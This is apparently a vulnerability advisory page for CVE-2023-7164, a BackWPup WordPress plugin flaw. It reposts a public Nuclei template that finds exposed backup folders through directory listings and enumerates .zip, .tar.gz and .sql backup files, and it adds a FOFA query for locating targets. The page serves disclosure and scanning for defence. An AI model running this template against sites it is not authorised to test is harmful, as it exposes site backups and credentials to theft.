CVE-2023-7164: WordPress BackWPup < 4.0.4 - Backup File Disclosure

日期: 2026-01-08 | 影响软件: WordPress BackWPup | POC: 已公开

漏洞描述

BackWPup WordPress plugin < 4.0.4 contains a directory listing vulnerability caused by lack of access restrictions in its temporary backup folder, letting unauthenticated attackers download site backups, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2023-7164

info:
  name: WordPress BackWPup < 4.0.4 - Backup File Disclosure
  author: 0x_Akoko
  severity: high
  description: |
    BackWPup WordPress plugin < 4.0.4 contains a directory listing vulnerability caused by lack of access restrictions in its temporary backup folder, letting unauthenticated attackers download site backups, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can download site backups, potentially leading to data theft or further exploitation.
  remediation: |
    Update to version 4.0.4 or later.
  reference:
    - https://wpscan.com/vulnerability/79b07f37-2c6b-4846-bb28-91a1e5bf112e/
    - https://research.cleantalk.org/cve-2023-7164/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-7164
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7164
    cwe-id: CWE-200
    epss-score: 0.35384
    epss-percentile: 0.96902
    cpe: cpe:2.3:a:inpsyde:backwpup:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 8
    fofa-query: body="/wp-content/plugins/backwpup/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,backwpup,exposure,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/"
      - "{{BaseURL}}/blog/wp-content/uploads/"
      - "{{BaseURL}}/wordpress/wp-content/uploads/"
      - "{{BaseURL}}/wp/wp-content/uploads/"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Index of")'
          - 'regex("backwpup-[a-f0-9]{6}-(backups|temp)", body)'
        internal: true

    extractors:
      - type: regex
        name: backupfolder
        part: body
        regex:
          - 'backwpup-[a-f0-9]{6}-(backups|temp)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/{{backupfolder}}/"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '[\w\-\.]+\.(tar\.gz|tar|zip|sql)'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: filename
        part: body
        regex:
          - '[\w\-\.]+\.(tar\.gz|tar|zip|sql)'
# digest: 4a0a00473045022100f8b51242a18e91bb379fce0d5491d715a5a1038747866a506f2e6424cffd8edb02207f0b7b97d7962945cc7307b09bb517d7c9f8431b9958d367061e6ebf64287c92:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-7164.yaml

相关漏洞推荐